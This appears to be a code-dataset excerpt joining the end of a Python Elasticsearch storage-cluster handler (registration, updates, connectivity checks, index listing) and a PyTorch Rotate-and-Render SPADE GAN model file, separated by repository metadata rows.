                scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
            ).cluster_stats()
        # Queue one stats request per cluster, keyed by its id
        for cluster in cluster_info:
            cluster_id = cluster.get("cluster_config").get("cluster_id")
            multi_execute_func.append(cluster_id, get_cluster_stats, cluster_id)
        result = multi_execute_func.run()
        for cluster in cluster_info:
            cluster_id = cluster.get("cluster_config").get("cluster_id")
            cluster_stats = result.get(cluster_id)
            cluster["cluster_stats"] = cluster_stats
        return cluster_info
    def create(self, params):
        """
        Register a new ES cluster, audit the action, and grant creator permissions.
        :param params: cluster registration payload (custom_option.bk_biz_id required)
        :return: the new cluster id
        """
        bk_biz_id = int(params["custom_option"]["bk_biz_id"])
        es_source_id = TransferApi.create_cluster_info(params)
        # add user_operation_record (asynchronous audit task)
        operation_record = {
            "username": get_request_username(),
            "biz_id": bk_biz_id,
            "record_type": UserOperationTypeEnum.STORAGE,
            "record_object_id": int(es_source_id),
            "action": UserOperationActionEnum.CREATE,
            "params": params,
        }
        user_operation_record.delay(operation_record)
        # Grant the creator IAM permissions on the new ES source resource
        Permission().grant_creator_action(
            resource=ResourceEnum.ES_SOURCE.create_simple_instance(
                es_source_id, attribute={"name": params["cluster_name"]}
            )
        )
        return es_source_id
    def update(self, params):
        """
        Update an editable cluster after permission and connectivity checks.
        :param params: new cluster settings (custom_option.bk_biz_id required)
        :return: the updated cluster record with its password blanked
        """
        # Check that the cluster exists and may be edited
        bk_biz_id = int(params["custom_option"]["bk_biz_id"])
        get_cluster_info_params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
        cluster_objs = TransferApi.get_cluster_info(get_cluster_info_params)
        if not cluster_objs:
            raise StorageNotExistException()
        # Shared (default) clusters are never editable
        if cluster_objs[0]["cluster_config"].get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
            raise StorageNotPermissionException()
        # The cluster must belong to the requesting business
        if cluster_objs[0]["cluster_config"]["custom_option"].get("bk_biz_id") != bk_biz_id:
            raise StorageNotPermissionException()
        # Fall back to the stored credentials when the frontend sends blanks
        if not params["auth_info"]["username"] or not params["auth_info"]["password"]:
            params["auth_info"]["username"] = cluster_objs[0]["auth_info"]["username"]
            params["auth_info"]["password"] = cluster_objs[0]["auth_info"]["password"]
        # Verify the new settings are reachable before persisting them
        BkLogApi.connectivity_detect(
            params={
                "bk_biz_id": bk_biz_id,
                "domain_name": params["domain_name"],
                "port": params["port"],
                "schema": params["schema"],
                "cluster_id": self.cluster_id,
                "es_auth_info": {
                    "username": params["auth_info"]["username"],
                    "password": params["auth_info"]["password"],
                },
            },
        )
        cluster_obj = TransferApi.modify_cluster_info(params)
        # Never echo the password back to the caller
        cluster_obj["auth_info"]["password"] = ""
        # add user_operation_record (asynchronous audit task)
        operation_record = {
            "username": get_request_username(),
            "biz_id": bk_biz_id,
            "record_type": UserOperationTypeEnum.STORAGE,
            "record_object_id": self.cluster_id,
            "action": UserOperationActionEnum.UPDATE,
            "params": params,
        }
        user_operation_record.delay(operation_record)
        return cluster_obj
    def destroy(self):
        """Delete the cluster registration; refused while an active index set still uses it."""
        # Local import — presumably to avoid a circular import; TODO confirm
        from apps.log_search.handlers.index_set import IndexSetHandler
        # check index_set
        index_sets = IndexSetHandler.get_index_set_for_storage(self.cluster_id)
        if index_sets.filter(is_active=True).exists():
            raise StorageHaveResource
        # TODO: also check clusters associated with the computation platform
        TransferApi.delete_cluster_info({"cluster_id": self.cluster_id})
    def connectivity_detect(
        self,
        bk_biz_id,
        domain_name=None,
        port=None,
        username=None,
        password=None,
        version_info=False,
        default_auth=False,
        schema=DEFAULT_ES_SCHEMA,
        **kwargs,
    ):
        """
        Probe an ES cluster for reachability (and optionally its version).

        With version_info=True the result is a (connected, version) tuple,
        otherwise just the connection-status bool.
        """
        # A username without a password means: look the password up via the API
        if self.cluster_id:
            params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
            clusters = TransferApi.get_cluster_info(params)
            # Verify the cluster exists and the caller may read it
            if not clusters:
                raise StorageNotExistException()
            cluster_obj = clusters[0]
            # The cluster's owning business must match the caller's
            cluster_config = cluster_obj["cluster_config"]
            custom_option = cluster_config.get("custom_option", {})
            custom_biz_id = custom_option.get("bk_biz_id")
            if custom_biz_id:
                if custom_biz_id != bk_biz_id:
                    raise StorageNotPermissionException()
            # Domain and port of a registered cluster may not be overridden
            domain_name = cluster_config["domain_name"]
            port = cluster_config["port"]
            # Keep the stored password when the user did not change it
            if username and not password:
                password = cluster_obj["auth_info"]["password"]
            # Batch connectivity tests reuse the stored credentials
            if default_auth:
                username = cluster_obj["auth_info"].get("username")
                password = cluster_obj["auth_info"].get("password")
            # Use the stored schema for batch status queries
            schema = cluster_config.get("schema") or DEFAULT_ES_SCHEMA
        connect_result = self._send_detective(domain_name, port, username, password, version_info, schema)
        return connect_result
def list_node_attrs(
self,
bk_biz_id,
domain_name=None,
port=None,
username=None,
password=None,
default_auth=False,
schema=DEFAULT_ES_SCHEMA,
**kwargs,
):
"""
获取集群各节点的属性
"""
# 有传用户但是没有密码,通过接口查询该cluster密码信息
if self.cluster_id:
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
cluster_obj = TransferApi.get_cluster_info(params)[0]
# 判断集群信息是否存在,及是否有读取改集群信息权限
if not cluster_obj:
raise StorageNotExistException()
# 比较集群bk_biz_id是否匹配
cluster_config = cluster_obj["cluster_config"]
custom_option = cluster_config.get("custom_option", {})
custom_biz_id = custom_option.get("bk_biz_id")
if custom_biz_id:
if int(custom_biz_id) != int(bk_biz_id):
raise StorageNotPermissionException()
# 集群不可以修改域名、端口
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
# 现有集群用户不修改密码则使用集群现有密码
if username and not password:
password = cluster_obj["auth_info"]["password"]
# 兼容批量连通性测试,使用存储凭据信息
if default_auth:
username = cluster_obj["auth_info"].get("username")
password = cluster_obj["auth_info"].get("password")
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
[domain_name], http_auth=http_auth, scheme=schema, port=port, sniffer_timeout=600, verify_certs=True
)
nodes = es_client.cat.nodeattrs(format="json", h="name,host,attr,value,id,ip")
# 对节点属性进行过滤,有些是内置的,需要忽略
filtered_nodes = []
for node in nodes:
for prefix in NODE_ATTR_PREFIX_BLACKLIST:
if node["attr"].startswith(prefix):
break
else:
filtered_nodes.append(node)
return filtered_nodes
@classmethod
def batch_connectivity_detect(cls, cluster_list, bk_biz_id):
"""
:param cluster_list:
:return:
"""
multi_execute_func = MultiExecuteFunc()
for _cluster_id in cluster_list:
multi_execute_func.append(
_cluster_id, cls._get_cluster_status_and_stats, {"cluster_id": _cluster_id, "bk_biz_id": bk_biz_id}
)
return multi_execute_func.run()
    @staticmethod
    def _get_cluster_status_and_stats(params):
        """Return {'status': bool, 'cluster_stats': dict | None} for one cluster, cached for five minutes."""
        @cache_five_minute("connect_info_{cluster_id}")
        def _cache_status_and_stats(*, cluster_id, bk_biz_id):
            cluster_stats_info = None
            try:
                _status = BkLogApi.connectivity_detect(
                    params={"bk_biz_id": bk_biz_id, "cluster_id": cluster_id, "default_auth": True},
                )
                cluster_stats = EsRoute(
                    scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
                ).cluster_stats()
                if cluster_stats:
                    cluster_stats_info = StorageHandler._build_cluster_stats(cluster_stats)
            except Exception as e:  # pylint: disable=broad-except
                # Best effort: an unreachable cluster is reported as down, not an error
                logger.error(f"[storage] get cluster status failed => [{e}]")
                _status = False
            return {"status": _status, "cluster_stats": cluster_stats_info}
        cluster_id = params.get("cluster_id")
        bk_biz_id = params.get("bk_biz_id")
        return _cache_status_and_stats(cluster_id=cluster_id, bk_biz_id=bk_biz_id)
@staticmethod
def _build_cluster_stats(cluster_stats):
return {
"node_count": cluster_stats["nodes"]["count"]["total"],
"shards_total": cluster_stats["indices"]["shards"]["total"],
"shards_pri": cluster_stats["indices"]["shards"]["primaries"],
"data_node_count": cluster_stats["nodes"]["count"]["data"],
"indices_count": cluster_stats["indices"]["count"],
"indices_docs_count": cluster_stats["indices"]["docs"]["count"],
"indices_store": cluster_stats["indices"]["store"]["size_in_bytes"],
"total_store": cluster_stats["nodes"]["fs"]["total_in_bytes"],
"status": cluster_stats["status"],
}
def _send_detective(
self, domain_name: str, port: int, username="", password="", version_info=False, schema=DEFAULT_ES_SCHEMA
) -> Union[bool, tuple]:
# 对host和port的连通性进行验证
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address = (str(domain_name), int(port))
cs.settimeout(2)
try:
status = cs.connect_ex(es_address)
# this status is returnback from tcpserver
if status != 0:
raise StorageConnectInfoException(
StorageConnectInfoException.MESSAGE.format(info=_("IP or PORT can not be reached"))
)
except Exception as e: # pylint: disable=broad-except
raise StorageConnectInfoException(
StorageConnectInfoException.MESSAGE.format(info=_("IP or PORT can not be reached, %s" % e))
)
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
[domain_name], http_auth=http_auth, scheme=schema, port=port, sniffer_timeout=600, verify_certs=True
)
if not es_client.ping():
connect_result = False
else:
connect_result = True
if not version_info:
return connect_result
else:
if connect_result:
info_dict = es_client.info()
version_number: str = self.dump_version_info(info_dict, domain_name, port)
return connect_result, version_number
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
def dump_version_info(self, info_dict: dict, domain_name: str, port: int) -> str:
if info_dict:
version = info_dict.get("version")
if version:
number = version.get("number")
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
return number
def get_cluster_info_by_id(self):
"""
根据集群ID查询集群信息,密码返回
:return:
"""
cluster_info = TransferApi.get_cluster_info({"cluster_id": self.cluster_id})
if not cluster_info:
raise StorageNotExistException()
return cluster_info[0]
def get_cluster_info_by_table(self, table_id):
"""
根据result_table_id查询集群信息
:return:
"""
cluster_info = TransferApi.get_result_table_storage(
{"result_table_list": table_id, "storage_type": STORAGE_CLUSTER_TYPE}
)
if not cluster_info.get(table_id):
raise StorageNotExistException()
return cluster_info[table_id]
    @classmethod
    def get_storage_capacity(cls, bk_biz_id, storage_clusters):
        """
        Return the shared-storage quota and current usage for a business.
        :param bk_biz_id: business id
        :param storage_clusters: ids of the shared clusters to sum usage over
        :return: {'storage_capacity': int, 'storage_used': float}
        """
        storage = {"storage_capacity": 0, "storage_used": 0}
        # A non-positive global quota disables capacity accounting entirely
        if int(settings.ES_STORAGE_CAPACITY) <= 0:
            return storage
        biz_storage = StorageCapacity.objects.filter(bk_biz_id=bk_biz_id).first()
        storage["storage_capacity"] = int(settings.ES_STORAGE_CAPACITY)
        # A per-business override takes precedence over the global default
        if biz_storage:
            storage["storage_capacity"] = biz_storage.storage_capacity
        storage_used = (
            StorageUsed.objects.filter(bk_biz_id=bk_biz_id, storage_cluster_id__in=storage_clusters)
            .all()
            .aggregate(total=Sum("storage_used"))
        )
        if storage_used:
            # aggregate() yields {'total': None} when no rows matched
            storage["storage_used"] = round(storage_used.get("total", 0) or 0, 2)
        return storage
def cluster_nodes(self):
result = EsRoute(scenario_id=Scenario.ES, storage_cluster_id=self.cluster_id).cluster_nodes_stats()
return [
{
"name": node["name"],
"ip": node["host"],
"cpu_use": node["os"]["cpu"]["percent"],
"disk_use": node["fs"]["total"]["available_in_bytes"] / node["fs"]["total"]["total_in_bytes"],
"jvm_mem_use": node["jvm"]["mem"]["heap_used_percent"],
"tag": node["attributes"].get("tag", ""),
}
for node in result.get("nodes").values()
]
def indices(self):
indices_info = EsRoute(scenario_id=Scenario.ES, storage_cluster_id=self.cluster_id).cat_indices()
indices_info = self.sort_indices(indices_info)
ret = defaultdict(dict)
other_indices = {"index_pattern": "other", "indices": []}
for indices in indices_info:
is_bklog_rt, rt = self._match_bklog_indices(indices["index"])
if is_bklog_rt and not indices["index"].startswith("write"):
ret[rt]["index_pattern"] = rt
ret[rt].setdefault("indices", []).append(indices)
continue
other_indices["indices"].append(indices)
result = []
for index in ret.values():
result.append(index)
result.append(other_indices)
return result
def _match_bklog_indices(self, index: str) -> (bool, str):
pattern = re.compile(BKLOG_RESULT_TABLE_PATTERN)
match = pattern.findall(index)
if match:
return True, match[0]
return False, ""
    @staticmethod
    def sort_indices(indices: list):
        """Sort physical indices newest-first by the (date, counter) suffix of their names."""
        def compare_indices_by_date(index_a, index_b):
            index_a = index_a.get("index")
            index_b = index_b.get("index")
            def convert_to_normal_date_tuple(index_name) -> tuple:
                # example 1: 2_bklog_xxxx_20200321_1 -> (20200321, 1)
                # example 2: 2_xxxx_2020032101 -> (20200321, 1)
                result = re.findall(r"(\d{8})_(\d{1,7})$", index_name) or re.findall(r"(\d{8})(\d{2})$", index_name)
                if result:
                    return result[0][0], int(result[0][1])
                # not match: fall back to the raw name so the ordering stays total
                return index_name, 0
            converted_index_a = convert_to_normal_date_tuple(index_a)
            converted_index_b = convert_to_normal_date_tuple(index_b)
            # cmp-style result: -1 / 0 / 1
            return (converted_index_a > converted_index_b) - (converted_index_a < converted_index_b)
        return sorted(indices, key=functools.cmp_to_key(compare_indices_by_date), reverse=True)
    def repository(self, bk_biz_id=None, cluster_id=None):
        """List ES snapshot repositories of the business's private clusters, annotated with cluster info."""
        cluster_info = self.list(bk_biz_id=bk_biz_id, cluster_id=cluster_id, is_default=False)
        cluster_info_by_id = {cluster["cluster_config"]["cluster_id"]: cluster for cluster in cluster_info}
        repository_info = TransferApi.list_es_snapshot_repository({"cluster_ids": list(cluster_info_by_id.keys())})
        for repository in repository_info:
            repository.update(
                {
                    "cluster_name": cluster_info_by_id[repository["cluster_id"]]["cluster_config"]["cluster_name"],
                    "cluster_source_name": cluster_info_by_id[repository["cluster_id"]].get("source_name"),
                    "cluster_source_type": cluster_info_by_id[repository["cluster_id"]].get("source_type"),
                    "create_time": format_user_time_zone(repository["create_time"], get_local_param("time_zone")),
                }
            )
            # Raw repository settings are internal; strip them from the response
            repository.pop("settings")
        return repository_info
| 40.950276 | 118 | 0.616601 |
14a852167c96b6fd3935ed85b7f84704d2379bb7 | 16,898 | py | Python | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | import torch
import models.networks as networks
import util.util as util
from data import curve
import numpy as np
import os
class RotateSPADEModel(torch.nn.Module):
    @staticmethod
    def modify_commandline_options(parser, is_train):
        """Register network-specific command line options and return the parser."""
        networks.modify_commandline_options(parser, is_train)
        return parser
    def __init__(self, opt):
        """Build the Rotate-and-Render SPADE model: networks and (in training) loss criteria."""
        super(RotateSPADEModel, self).__init__()
        self.opt = opt
        self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)
        # Use CUDA tensor types when GPUs are configured
        self.FloatTensor = torch.cuda.FloatTensor if self.use_gpu() \
            else torch.FloatTensor
        self.ByteTensor = torch.cuda.ByteTensor if self.use_gpu() \
            else torch.ByteTensor
        # Placeholder buffers sized like one batch of images / semantic maps
        self.real_image = torch.zeros(opt.batchSize, 3, opt.crop_size, opt.crop_size)
        self.input_semantics = torch.zeros(opt.batchSize, 3, opt.crop_size, opt.crop_size)
        self.netG, self.netD, self.netE, self.netD_rotate = self.initialize_networks(opt)
        # set loss functions
        if opt.isTrain:
            self.criterionGAN = networks.GANLoss(
                opt.gan_mode, tensor=self.FloatTensor, opt=self.opt)
            self.criterionFeat = torch.nn.L1Loss()
            if not opt.no_vgg_loss:
                self.criterionVGG = networks.VGGLoss(self.opt)
            if opt.use_vae:
                self.KLDLoss = networks.KLDLoss()
def landmark_68_to_5(self, t68):
le = t68[36:42, :].mean(axis=0, keepdims=True)
re = t68[42:48, :].mean(axis=0, keepdims=True)
no = t68[31:32, :]
lm = t68[48:49, :]
rm = t68[54:55, :]
t5 = np.concatenate([le, re, no, lm, rm], axis=0)
t5 = t5.reshape(10)
t5 = torch.from_numpy(t5).unsqueeze(0).cuda()
return t5
def get_seg_map(self, landmarks, no_guassian=False, size=256, original_angles=None):
landmarks = landmarks[:, :, :2].cpu().numpy().astype(np.float)
all_heatmap = []
all_orig_heatmap = []
if original_angles is None:
original_angles = torch.zeros(landmarks.shape[0])
# key_points = []
for i in range(landmarks.shape[0]):
heatmap = curve.points_to_heatmap_68points(landmarks[i], 13, size, self.opt.heatmap_size)
heatmap2 = curve.combine_map(heatmap, no_guassian=no_guassian)
if self.opt.isTrain:
if np.random.randint(2):
heatmap = np.zeros_like(heatmap)
else:
if torch.abs(original_angles[i]) < 0.255:
heatmap = np.zeros_like(heatmap)
all_heatmap.append(heatmap2)
all_orig_heatmap.append(heatmap)
# key_points.append(self.landmark_68_to_5(landmarks[i]))
all_heatmap = np.stack(all_heatmap, axis=0)
all_orig_heatmap = np.stack(all_orig_heatmap, axis=0)
all_heatmap = torch.from_numpy(all_heatmap.astype(np.float32)).cuda()
all_orig_heatmap = torch.from_numpy(all_orig_heatmap.astype(np.float32)).cuda()
all_orig_heatmap = all_orig_heatmap.permute(0, 3, 1, 2)
all_orig_heatmap[all_orig_heatmap > 0] = 2.0
return all_heatmap, all_orig_heatmap
    # Entry point for all calls involving forward pass
    # of deep networks. We used this approach since DataParallel module
    # can't parallelize custom functions, we branch to different
    # routines based on |mode|.
    # |data|: dictionary of the input data
    def forward(self, data, mode):
        """Dispatch one generator/discriminator/encode/inference step according to *mode*."""
        real_image = data['image']
        orig_landmarks = data['orig_landmarks']
        rotated_landmarks = data['rotated_landmarks']
        original_angles = data['original_angles']
        self.orig_seg, orig_seg_all = \
            self.get_seg_map(orig_landmarks, self.opt.no_gaussian_landmark, self.opt.crop_size, original_angles)
        self.rotated_seg, rotated_seg_all = \
            self.get_seg_map(rotated_landmarks, self.opt.no_gaussian_landmark, self.opt.crop_size, original_angles)
        input_semantics = data['mesh']
        rotated_mesh = data['rotated_mesh']
        if self.opt.label_mask:
            # Merge landmark mask channels 0 and 4 into the mesh label,
            # then zero out pixels where the sum saturates
            input_semantics = (input_semantics + orig_seg_all[:, 4].unsqueeze(1) + orig_seg_all[:, 0].unsqueeze(1))
            rotated_mesh = (rotated_mesh + rotated_seg_all[:, 4].unsqueeze(1) + rotated_seg_all[:, 0].unsqueeze(1))
            input_semantics[input_semantics >= 1] = 0
            rotated_mesh[rotated_mesh >= 1] = 0
        if mode == 'generator':
            g_loss, generated = self.compute_generator_loss(
                input_semantics, real_image, self.orig_seg, netD=self.netD, mode=mode, no_ganFeat_loss=self.opt.no_ganFeat_loss,
                no_vgg_loss=self.opt.no_vgg_loss, lambda_D=self.opt.lambda_D)
            return g_loss, generated, input_semantics
        if mode == 'generator_rotated':
            # The rotated branch uses its own discriminator and skips the feature-matching loss
            g_loss, generated = self.compute_generator_loss(
                rotated_mesh, real_image, self.rotated_seg, netD=self.netD_rotate, mode=mode, no_ganFeat_loss=True,
                no_vgg_loss=self.opt.no_vgg_loss, lambda_D=self.opt.lambda_rotate_D)
            return g_loss, generated, rotated_mesh
        elif mode == 'discriminator':
            d_loss = self.compute_discriminator_loss(
                input_semantics, real_image, self.orig_seg, netD=self.netD, lambda_D=self.opt.lambda_D)
            return d_loss
        elif mode == 'discriminator_rotated':
            d_loss = self.compute_discriminator_loss(
                rotated_mesh, real_image, self.rotated_seg, self.netD_rotate, lambda_D=self.opt.lambda_rotate_D)
            return d_loss
        elif mode == 'encode_only':
            z, mu, logvar = self.encode_z(real_image)
            return mu, logvar
        elif mode == 'inference':
            with torch.no_grad():
                # NOTE(review): when label_mask is set, the landmark masks were
                # already added to rotated_mesh above, so this adds them a
                # second time — confirm whether that is intended.
                if self.opt.label_mask:
                    rotated_mesh = (
                        rotated_mesh + rotated_seg_all[:, 4].unsqueeze(1) + rotated_seg_all[:, 0].unsqueeze(1))
                    rotated_mesh[rotated_mesh >= 1] = 0
                fake_image, _ = self.generate_fake(input_semantics, real_image, self.orig_seg)
                fake_rotate, _ = self.generate_fake(rotated_mesh, real_image, self.rotated_seg)
            return fake_image, fake_rotate
        else:
            raise ValueError("|mode| is invalid")
    def create_optimizers(self, opt):
        """Build (optimizer_G, optimizer_D); TTUR halves G's lr and doubles D's unless disabled."""
        G_params = list(self.netG.parameters())
        if opt.use_vae:
            G_params += list(self.netE.parameters())
        # NOTE(review): D_params is only bound when opt.isTrain — calling this
        # with isTrain False would raise NameError below. Confirm callers.
        if opt.isTrain:
            if opt.train_rotate:
                D_params = list(self.netD.parameters()) + list(self.netD_rotate.parameters())
            else:
                D_params = self.netD.parameters()
        if opt.no_TTUR:
            beta1, beta2 = opt.beta1, opt.beta2
            G_lr, D_lr = opt.lr, opt.lr
        else:
            # Two time-scale update rule: slower generator, faster discriminator
            beta1, beta2 = 0, 0.9
            G_lr, D_lr = opt.lr / 2, opt.lr * 2
        optimizer_G = torch.optim.Adam(G_params, lr=G_lr, betas=(beta1, beta2))
        optimizer_D = torch.optim.Adam(D_params, lr=D_lr, betas=(beta1, beta2))
        return optimizer_G, optimizer_D
def save(self, epoch):
util.save_network(self.netG, 'G', epoch, self.opt)
util.save_network(self.netD, 'D', epoch, self.opt)
if self.opt.train_rotate:
util.save_network(self.netD_rotate, 'D_rotate', epoch, self.opt)
if self.opt.use_vae:
util.save_network(self.netE, 'E', epoch, self.opt)
############################################################################
# Private helper methods
############################################################################
    def initialize_networks(self, opt):
        """Construct G / D / D_rotate / E and load weights per the train/continue/pretrain options."""
        netG = networks.define_G(opt)
        netD = networks.define_D(opt) if opt.isTrain else None
        netD_rotate = networks.define_D(opt) if opt.isTrain else None
        netE = networks.define_E(opt) if opt.use_vae else None
        pretrained_path = ''
        if not opt.isTrain or opt.continue_train:
            # Resume / test: load the checkpoints saved by this experiment
            self.load_network(netG, 'G', opt.which_epoch, pretrained_path)
            if opt.isTrain and not opt.noload_D:
                self.load_network(netD, 'D', opt.which_epoch, pretrained_path)
                self.load_network(netD_rotate, 'D_rotate', opt.which_epoch, pretrained_path)
            if opt.use_vae:
                self.load_network(netE, 'E', opt.which_epoch, pretrained_path)
        else:
            if opt.load_separately:
                # Fresh training bootstrapped from individually specified checkpoints
                netG = self.load_separately(netG, 'G', opt)
                if not opt.noload_D:
                    netD = self.load_separately(netD, 'D', opt)
                    netD_rotate = self.load_separately(netD_rotate, 'D_rotate', opt)
                if opt.use_vae:
                    netE = self.load_separately(netE, 'E', opt)
        return netG, netD, netE, netD_rotate
    # Compute all generator-side losses (GAN, feature matching, VGG, optional KLD)
    # for one batch; returns the loss dict together with the generated image.
    def compute_generator_loss(self, input_semantics, real_image, seg, netD, mode, no_ganFeat_loss=False, no_vgg_loss=False, lambda_D=1):
        G_losses = {}
        fake_image, KLD_loss = self.generate_fake(
            input_semantics, real_image, seg, compute_kld_loss=self.opt.use_vae)
        if self.opt.use_vae:
            G_losses['KLD'] = KLD_loss
        pred_fake, pred_real = self.discriminate(
            input_semantics, fake_image, real_image, seg, netD)
        G_losses['GAN'] = self.criterionGAN(pred_fake, True,
                                            for_discriminator=False) * lambda_D
        if not no_ganFeat_loss:
            num_D = len(pred_fake)
            GAN_Feat_loss = self.FloatTensor(1).fill_(0)
            for i in range(num_D):  # for each discriminator
                # last output is the final prediction, so we exclude it
                num_intermediate_outputs = len(pred_fake[i]) - 1
                for j in range(num_intermediate_outputs):  # for each layer output
                    unweighted_loss = self.criterionFeat(
                        pred_fake[i][j], pred_real[i][j].detach())
                    if j == 0:
                        # extra weight on the first layer output (presumably the
                        # image-level features, given the option name — TODO confirm)
                        unweighted_loss *= self.opt.lambda_image
                    GAN_Feat_loss += unweighted_loss * self.opt.lambda_feat / num_D
            G_losses['GAN_Feat'] = GAN_Feat_loss
        if not no_vgg_loss:
            # `num` selects a VGG-loss variant for rotated vs. original views — TODO confirm semantics
            if mode == 'generator_rotated':
                num = 2
            else:
                num = 0
            G_losses['VGG'] = self.criterionVGG(fake_image, real_image, num) \
                * self.opt.lambda_vgg
        return G_losses, fake_image
    def compute_discriminator_loss(self, input_semantics, real_image, seg, netD, lambda_D=1):
        """D-side losses for one batch; G's output is detached so only D receives gradients."""
        D_losses = {}
        with torch.no_grad():
            fake_image, _ = self.generate_fake(input_semantics, real_image, seg)
            fake_image = fake_image.detach()
            fake_image.requires_grad_()
        pred_fake, pred_real= self.discriminate(
            input_semantics, fake_image, real_image, seg, netD)
        D_losses['D_Fake'] = self.criterionGAN(pred_fake, False,
                                               for_discriminator=True) * lambda_D
        D_losses['D_real'] = self.criterionGAN(pred_real, True,
                                               for_discriminator=True) * lambda_D
        return D_losses
def encode_z(self, real_image):
mu, logvar = self.netE(real_image)
z = self.reparameterize(mu, logvar)
return z, mu, logvar
    def generate_fake(self, input_semantics, real_image, seg, compute_kld_loss=False):
        """Run G and return (fake_image, KLD_loss or None)."""
        z = None
        KLD_loss = None
        if self.opt.use_vae:
            # NOTE(review): z is computed here but not passed to netG below — confirm intent
            z, mu, logvar = self.encode_z(real_image)
            if compute_kld_loss:
                KLD_loss = self.KLDLoss(mu, logvar) * self.opt.lambda_kld
        fake_image = self.netG(input_semantics, seg)
        # NOTE(review): this assert only fires after the KLD work above already ran;
        # it guards against requesting a KLD loss without a VAE encoder
        assert (not compute_kld_loss) or self.opt.use_vae, \
            "You cannot compute KLD loss if opt.use_vae == False"
        return fake_image, KLD_loss
    # Given fake and real image, return the prediction of discriminator
    # for each fake and real image.
    def discriminate(self, input_semantics, fake_image, real_image, seg, netD):
        """Run netD on fake and real inputs in one concatenated batch; return (pred_fake, pred_real)."""
        if self.opt.D_input == "concat":
            # Condition D on the landmark segmentation by channel-concatenation
            fake_concat = torch.cat([seg, fake_image], dim=1)
            real_concat = torch.cat([self.orig_seg, real_image], dim=1)
        else:
            fake_concat = fake_image
            real_concat = real_image
        # In Batch Normalization, the fake and real images are
        # recommended to be in the same batch to avoid disparate
        # statistics in fake and real images.
        # So both fake and real images are fed to D all at once.
        fake_and_real = torch.cat([fake_concat, real_concat], dim=0)
        discriminator_out = netD(fake_and_real)
        pred_fake, pred_real = self.divide_pred(discriminator_out)
        return pred_fake, pred_real
# Take the prediction of fake and real images from the combined batch
def divide_pred(self, pred):
# the prediction contains the intermediate outputs of multiscale GAN,
# so it's usually a list
if type(pred) == list:
fake = []
real = []
for p in pred:
fake.append([tensor[:tensor.size(0) // 2] for tensor in p])
real.append([tensor[tensor.size(0) // 2:] for tensor in p])
else:
fake = pred[:pred.size(0) // 2]
# rotate_fake = pred[pred.size(0) // 3: pred.size(0) * 2 // 3]
real = pred[pred.size(0)//2 :]
return fake, real
    def get_edges(self, t):
        """Return a float mask marking pixels whose value differs from a 4-neighbour (label edges)."""
        edge = self.ByteTensor(t.size()).zero_()
        # Horizontal neighbours
        edge[:, :, :, 1:] = edge[:, :, :, 1:] | (t[:, :, :, 1:] != t[:, :, :, :-1])
        edge[:, :, :, :-1] = edge[:, :, :, :-1] | (t[:, :, :, 1:] != t[:, :, :, :-1])
        # Vertical neighbours
        edge[:, :, 1:, :] = edge[:, :, 1:, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])
        edge[:, :, :-1, :] = edge[:, :, :-1, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])
        return edge.float()
def load_separately(self, network, network_label, opt):
load_path = None
if network_label == 'G':
load_path = opt.G_pretrain_path
elif network_label == 'D':
load_path = opt.D_pretrain_path
elif network_label == 'D_rotate':
load_path = opt.D_rotate_pretrain_path
elif network_label == 'E':
load_path = opt.E_pretrain_path
if load_path is not None:
if os.path.isfile(load_path):
print("=> loading checkpoint '{}'".format(load_path))
checkpoint = torch.load(load_path)
util.copy_state_dict(checkpoint, network)
else:
print("no load_path")
return network
def load_network(self, network, network_label, epoch_label, save_dir=''):
save_filename = '%s_net_%s.pth' % (epoch_label, network_label)
if not save_dir:
save_dir = self.save_dir
save_path = os.path.join(save_dir, save_filename)
if not os.path.isfile(save_path):
print('%s not exists yet!' % save_path)
if network_label == 'G':
raise ('Generator must exist!')
else:
# network.load_state_dict(torch.load(save_path))
try:
network.load_state_dict(torch.load(save_path))
except:
pretrained_dict = torch.load(save_path)
model_dict = network.state_dict()
try:
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
network.load_state_dict(pretrained_dict)
if self.opt.verbose:
print(
'Pretrained network %s has excessive layers; Only loading layers that are used' % network_label)
except:
print('Pretrained network %s has fewer layers; The following are not initialized:' % network_label)
for k, v in pretrained_dict.items():
if v.size() == model_dict[k].size():
model_dict[k] = v
not_initialized = set()
for k, v in model_dict.items():
if k not in pretrained_dict or v.size() != pretrained_dict[k].size():
not_initialized.add(k.split('.')[0])
print(sorted(not_initialized))
network.load_state_dict(model_dict)
def reparameterize(self, mu, logvar):
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps.mul(std) + mu
def use_gpu(self):
return len(self.opt.gpu_ids) > 0
| 42.779747 | 137 | 0.586105 |
67257598368a15646fcafd54069b287508ea5b4f | 12,272 | py | Python | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
